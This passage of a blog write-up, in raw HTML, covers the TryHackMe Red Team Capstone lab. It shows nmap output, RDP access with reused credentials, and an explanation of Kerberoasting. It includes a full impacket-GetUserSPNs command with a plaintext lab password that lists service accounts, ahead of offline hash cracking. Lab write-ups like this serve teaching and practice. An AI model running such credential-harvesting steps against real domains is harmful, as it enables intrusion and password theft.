#FFCB6B\">DNS_Tree_Name:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">thereserve.loc<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">Product_Version:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">10.0<\/span><span style=\"color: #C3E88D\">.17763<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">System_Time:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2024<\/span><span style=\"color: #C3E88D\">-02-06T18:13:09+00:00<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Service<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Info:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: 
#C3E88D\">OS:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Windows<\/span><span style=\"color: #89DDFF\">;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">CPE:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">cpe:\/o:microsoft:windows<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Host<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">script<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">results:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">smb2-security-mode:<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #FFCB6B\">3:1:1:<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_<\/span><span style=\"color: #BABED8\">    <\/span><span style=\"color: #C3E88D\">Message<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">signing<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">enabled<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">but<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">not<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">required<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">smb2-time:<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: 
#FFCB6B\">date:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2024<\/span><span style=\"color: #C3E88D\">-02-06T18:13:08<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">start_date:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">N\/A<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">|<\/span><span style=\"color: #FFCB6B\">_clock-skew:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">mean:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-1s,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">deviation:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">0<\/span><span style=\"color: #C3E88D\">s,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">median:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-1s<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Since RDP is open, we can try connecting with the credentials we have. We can see that we are successfully able to RDP into the <code>WRK1<\/code> machine. 
The same credentials work on the <code>WRK2<\/code> machine as well.<\/p>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b091119ce&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b091119ce\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-attachment-id=\"490\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206121625\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206121625.png?fit=1702%2C957&amp;ssl=1\" data-orig-size=\"1702,957\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206121625\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206121625.png?fit=1024%2C576&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206121625.png?resize=1024%2C576&#038;ssl=1\" alt=\"\" class=\"wp-image-490\" 
srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206121625.png?resize=1024%2C576&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206121625.png?resize=300%2C169&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206121625.png?resize=768%2C432&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206121625.png?resize=1536%2C864&amp;ssl=1 1536w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206121625.png?w=1702&amp;ssl=1 1702w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:8px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>At this point, we can submit the proofs of compromise and receive the first four flags.
Please refer to the section <code>Submitting the Flags<\/code> above to see the instructions on connecting to the <code>e-citizen<\/code> platform and submitting the <code>proof of compromise<\/code>.<\/p>\n\n\n\n<div style=\"height:14px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b09112142&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b09112142\" class=\"wp-block-image size-large wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"587\" data-attachment-id=\"494\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/pasted-image-20240206154955\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206154955.png?fit=1339%2C768&amp;ssl=1\" data-orig-size=\"1339,768\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Pasted-image-20240206154955\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206154955.png?fit=1024%2C587&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\"
src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206154955.png?resize=1024%2C587&#038;ssl=1\" alt=\"\" class=\"wp-image-494\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206154955.png?resize=1024%2C587&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206154955.png?resize=300%2C172&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206154955.png?resize=768%2C440&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/Pasted-image-20240206154955.png?w=1339&amp;ssl=1 1339w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><button\n\t\t\tclass=\"lightbox-trigger\"\n\t\t\ttype=\"button\"\n\t\t\taria-haspopup=\"dialog\"\n\t\t\taria-label=\"Enlarge\"\n\t\t\tdata-wp-init=\"callbacks.initTriggerButton\"\n\t\t\tdata-wp-on--click=\"actions.showLightbox\"\n\t\t\tdata-wp-style--right=\"state.imageButtonRight\"\n\t\t\tdata-wp-style--top=\"state.imageButtonTop\"\n\t\t>\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewBox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\" \/>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>The credentials we have do not work on the <code>Server1<\/code> and <code>Server2<\/code> machines.
We will next try a <code>Kerberoasting<\/code> attack against the Server machines.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"29-kerberoasting-\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Kerberoasting<\/mark><\/h3>\n\n\n\n<p>Kerberoasting is a technique used in cybersecurity attacks to exploit weaknesses in the Kerberos authentication protocol, which is commonly used in Windows Active Directory environments for user authentication. In Kerberoasting attacks, an attacker targets service accounts that use Kerberos to authenticate, such as database or application service accounts.<\/p>\n\n\n\n<p>The attack works by requesting a ticket-granting service (TGS) ticket for a target service account from the Key Distribution Center (KDC) in the Active Directory domain. These service accounts often have a Service Principal Name (SPN) associated with them, which is used for Kerberos authentication. Once the TGS ticket is obtained, the attacker can attempt to crack the ticket&#8217;s encryption to extract the account&#8217;s password hash.<\/p>\n\n\n\n<p>Once the password hash is obtained, the attacker can then attempt to crack it using offline password-cracking techniques, such as dictionary attacks or brute-force attacks. If successful, the attacker gains access to the service account&#8217;s credentials, which can be used to further escalate privileges within the network.<\/p>\n\n\n\n<p><a href=\"https:\/\/github.com\/SecureAuthCorp\/impacket\/blob\/master\/examples\/GetUserSPNs.py\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">GetUserSPNs.py<\/a> can be used to obtain a password hash for user accounts that have an SPN (service principal name). If an SPN is set on a user account, it is possible to request a Service Ticket for this account and attempt to crack it in order to retrieve the user password.
This attack is named <a href=\"https:\/\/www.thehacker.recipes\/ad\/movement\/kerberos\/kerberoast\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">Kerberoast<\/a>. This script can also be used for <a href=\"https:\/\/www.thehacker.recipes\/ad\/movement\/kerberos\/kerberoast#kerberoast-w-o-pre-authentication\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">Kerberoast without authentication<\/a>.<\/p>\n\n\n\n<p>We will use a tool called <code>Impacket-GetUserSPNs<\/code> to grab Kerberos hashes for the users. We get the hashes for the following users.<\/p>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"\u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/RedTeam-Capstone]\n\u2514\u2500$ proxychains4 impacket-GetUserSPNs corp.thereserve.loc\/laura.wood:'Password1@' -dc-ip 10.200.113.102 -request\n[proxychains] config file found: \/etc\/proxychains.conf\n[proxychains] preloading \/usr\/lib\/x86_64-linux-gnu\/libproxychains.so.4\n[proxychains] DLL init: 
proxychains-ng 4.16\n[proxychains] DLL init: proxychains-ng 4.16\n[proxychains] DLL init: proxychains-ng 4.16\nImpacket v0.11.0 - Copyright 2023 Fortra\n\n[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.113.102:389  ...  OK\nServicePrincipalName  Name         MemberOf                                                   PasswordLastSet             LastLogon                   Delegation \n--------------------  -----------  ---------------------------------------------------------  --------------------------  --------------------------  ----------\ncifs\/scvScanning      svcScanning  CN=Services,OU=Groups,DC=corp,DC=thereserve,DC=loc         2023-02-15 03:07:06.603818  &lt;never&gt;                                \ncifs\/svcBackups       svcBackups   CN=Services,OU=Groups,DC=corp,DC=thereserve,DC=loc         2023-02-15 03:05:59.787089  2023-02-15 03:42:19.327102             \nhttp\/svcEDR           svcEDR       CN=Services,OU=Groups,DC=corp,DC=thereserve,DC=loc         2023-02-15 03:06:21.150738  &lt;never&gt;                                \nhttp\/svcMonitor       svcMonitor   CN=Services,OU=Groups,DC=corp,DC=thereserve,DC=loc         2023-02-15 03:06:43.306959  &lt;never&gt;                                \nmssql\/svcOctober      svcOctober   CN=Internet Access,OU=Groups,DC=corp,DC=thereserve,DC=loc  2023-02-15 03:07:45.563346  2023-03-30 17:26:54.115866 \" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 
2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM\/RedTeam-Capstone<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">proxychains4<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">impacket-GetUserSPNs<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">corp.thereserve.loc\/laura.wood:<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #C3E88D\">Password1@<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-dc-ip<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">10.200<\/span><span style=\"color: #C3E88D\">.113.102<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-request<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">proxychains<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> config file found: \/etc\/proxychains.conf<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">proxychains<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> preloading \/usr\/lib\/x86_64-linux-gnu\/libproxychains.so.4<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">proxychains<\/span><span style=\"color: #89DDFF\">]<\/span><span 
style=\"color: #BABED8\"> DLL init: proxychains-ng 4.16<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">proxychains<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> DLL init: proxychains-ng 4.16<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">proxychains<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> DLL init: proxychains-ng 4.16<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Impacket<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">v0.11.0<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Copyright<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2023<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Fortra<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">proxychains<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\"> Strict chain  ...  127.0.0.1:1080  ...  10.200.113.102:389  ...  
OK<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">ServicePrincipalName<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">Name<\/span><span style=\"color: #BABED8\">         <\/span><span style=\"color: #C3E88D\">MemberOf<\/span><span style=\"color: #BABED8\">                                                   <\/span><span style=\"color: #C3E88D\">PasswordLastSet<\/span><span style=\"color: #BABED8\">             <\/span><span style=\"color: #C3E88D\">LastLogon<\/span><span style=\"color: #BABED8\">                   <\/span><span style=\"color: #C3E88D\">Delegation<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">--------------------<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">-----------<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">---------------------------------------------------------<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">--------------------------<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">--------------------------<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">----------<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">cifs\/scvScanning<\/span><span style=\"color: #BABED8\">      <\/span><span style=\"color: #C3E88D\">svcScanning<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">CN=Services,OU=Groups,DC=corp,DC=thereserve,DC=loc<\/span><span style=\"color: #BABED8\">         <\/span><span style=\"color: #F78C6C\">2023<\/span><span style=\"color: #C3E88D\">-02-15<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">03<\/span><span style=\"color: #C3E88D\">:07:06.603818<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: 
#C3E88D\">neve<\/span><span style=\"color: #BABED8\">r<\/span><span style=\"color: #89DDFF\">&gt;<\/span><span style=\"color: #BABED8\">                                <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">cifs\/svcBackups<\/span><span style=\"color: #BABED8\">       <\/span><span style=\"color: #C3E88D\">svcBackups<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #C3E88D\">CN=Services,OU=Groups,DC=corp,DC=thereserve,DC=loc<\/span><span style=\"color: #BABED8\">         <\/span><span style=\"color: #F78C6C\">2023<\/span><span style=\"color: #C3E88D\">-02-15<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">03<\/span><span style=\"color: #C3E88D\">:05:59.787089<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #F78C6C\">2023<\/span><span style=\"color: #C3E88D\">-02-15<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">03<\/span><span style=\"color: #C3E88D\">:42:19.327102<\/span><span style=\"color: #BABED8\">             <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">http\/svcEDR<\/span><span style=\"color: #BABED8\">           <\/span><span style=\"color: #C3E88D\">svcEDR<\/span><span style=\"color: #BABED8\">       <\/span><span style=\"color: #C3E88D\">CN=Services,OU=Groups,DC=corp,DC=thereserve,DC=loc<\/span><span style=\"color: #BABED8\">         <\/span><span style=\"color: #F78C6C\">2023<\/span><span style=\"color: #C3E88D\">-02-15<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">03<\/span><span style=\"color: #C3E88D\">:06:21.150738<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #C3E88D\">neve<\/span><span style=\"color: #BABED8\">r<\/span><span style=\"color: #89DDFF\">&gt;<\/span><span style=\"color: #BABED8\">                                <\/span><\/span>\n<span class=\"line\"><span style=\"color: 
#FFCB6B\">http\/svcMonitor<\/span><span style=\"color: #BABED8\">       <\/span><span style=\"color: #C3E88D\">svcMonitor<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #C3E88D\">CN=Services,OU=Groups,DC=corp,DC=thereserve,DC=loc<\/span><span style=\"color: #BABED8\">         <\/span><span style=\"color: #F78C6C\">2023<\/span><span style=\"color: #C3E88D\">-02-15<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">03<\/span><span style=\"color: #C3E88D\">:06:43.306959<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #C3E88D\">neve<\/span><span style=\"color: #BABED8\">r<\/span><span style=\"color: #89DDFF\">&gt;<\/span><span style=\"color: #BABED8\">                                <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">mssql\/svcOctober<\/span><span style=\"color: #BABED8\">      <\/span><span style=\"color: #C3E88D\">svcOctober<\/span><span style=\"color: #BABED8\">   <\/span><span style=\"color: #C3E88D\">CN=Internet<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Access,OU=Groups,DC=corp,DC=thereserve,DC=loc<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #F78C6C\">2023<\/span><span style=\"color: #C3E88D\">-02-15<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">03<\/span><span style=\"color: #C3E88D\">:07:45.563346<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #F78C6C\">2023<\/span><span style=\"color: #C3E88D\">-03-30<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">17<\/span><span style=\"color: #C3E88D\">:26:54.115866<\/span><span style=\"color: #BABED8\"> <\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>The output of this will also give us hashes for the above users. 
We will save the hashes for each user and start cracking them offline.<\/p>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure data-wp-context=\"{&quot;imageId&quot;:&quot;6a03b09112a06&quot;}\" data-wp-interactive=\"core\/image\" data-wp-key=\"6a03b09112a06\" class=\"wp-block-image size-full wp-lightbox-container\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"725\" data-attachment-id=\"565\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/18\/tryhackme-red-team-capstone-challenge\/kerb-hash\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/kerb-hash.png?fit=1024%2C725&amp;ssl=1\" data-orig-size=\"1024,725\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"kerb-hash\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/kerb-hash.png?fit=1024%2C725&amp;ssl=1\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on--click=\"actions.showLightbox\" data-wp-on--load=\"callbacks.setButtonStyles\" data-wp-on-window--resize=\"callbacks.setButtonStyles\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/kerb-hash.png?resize=1024%2C725&#038;ssl=1\" alt=\"\" class=\"wp-image-565\" 